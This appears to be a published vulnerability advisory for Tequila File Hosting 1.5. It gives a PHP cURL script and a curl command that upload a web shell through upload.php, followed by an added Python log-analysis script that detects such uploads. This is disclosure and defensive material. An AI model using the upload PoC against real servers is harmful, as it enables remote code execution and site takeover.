Tequila File Hosting 1.5 Shell Upload
Posted on 16 December 2015
================================================================================
Tequila File Hosting Unrestricted File Upload
================================================================================
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Date: 16/12/2015
# Software Link: http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar
# Author: Ashiyane Digital Security Team
# Version: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-upload.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which allows
companies or individuals to upload, manage and share their files online.
It is studied in every feature and was produced with attention to every detail.

# PoC :
First register on the site ===> http://localhost/tequila/register.php
Next, use this exploit:

<?php
// page : upload.php
$postData = array('folder' => '/username', 'file' => '@shell.php');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

or

curl -i -F folder='/ehsann' -F file=@ehsan.png http://localhost/tequila/upload.php

Sheller uploaded.
Path of shell : http://localhost/tequila/files/username/shell.php
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
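
Detection example (added here, not part of the original advisory): a log check that flags requests for script-like files under the upload directory and notes whether the same client posted to upload.php beforehand. The log lines are constructed samples in common log format, the paths are the ones the advisory gives, and the extension list is an assumption to adjust to the server's handler configuration.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (common log format); not from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Dec/2015:10:01:02 +0000] "POST /tequila/register.php HTTP/1.1" 302 0
203.0.113.7 - - [16/Dec/2015:10:02:10 +0000] "POST /tequila/upload.php HTTP/1.1" 200 41
203.0.113.7 - - [16/Dec/2015:10:02:31 +0000] "GET /tequila/files/username/shell.php HTTP/1.1" 200 12
198.51.100.4 - - [16/Dec/2015:10:05:00 +0000] "POST /tequila/upload.php HTTP/1.1" 200 41
198.51.100.4 - - [16/Dec/2015:10:05:09 +0000] "GET /tequila/files/alice/report.pdf HTTP/1.1" 200 88211
192.0.2.9 - - [16/Dec/2015:10:07:44 +0000] "GET /tequila/files/bob/notes.PHP5?x=1 HTTP/1.1" 404 0
"""

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Assumed list of extensions mapped to the PHP handler; also catches "x.php.jpg".
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|pht)(\.|$)', re.I)
UPLOAD_PATH = "/tequila/upload.php"   # paths as given in the advisory
FILES_PREFIX = "/tequila/files/"

def find_script_hits(log_text):
    """Return one finding per request for a script-like file in the upload dir."""
    last_upload = {}   # client IP -> time of its most recent POST to upload.php
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, ts, method, url, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = url.split("?", 1)[0]          # ignore the query string
        if method == "POST" and path == UPLOAD_PATH:
            last_upload[ip] = when
        elif path.startswith(FILES_PREFIX) and SCRIPT_EXT.search(path):
            findings.append({
                "ip": ip, "path": path, "status": int(status),
                # 2xx: the server answered for the script instead of rejecting it
                "served": status.startswith("2"),
                "uploaded_by_same_ip": ip in last_upload and last_upload[ip] <= when,
            })
    return findings

if __name__ == "__main__":
    for finding in find_script_hits(SAMPLE_LOG):
        print(finding)
```

A finding with "served" set means a script-like file exists under files/ and the server responded for it, which is the condition the upload handler should prevent by allowlisting extensions and storing uploads where the PHP handler is disabled.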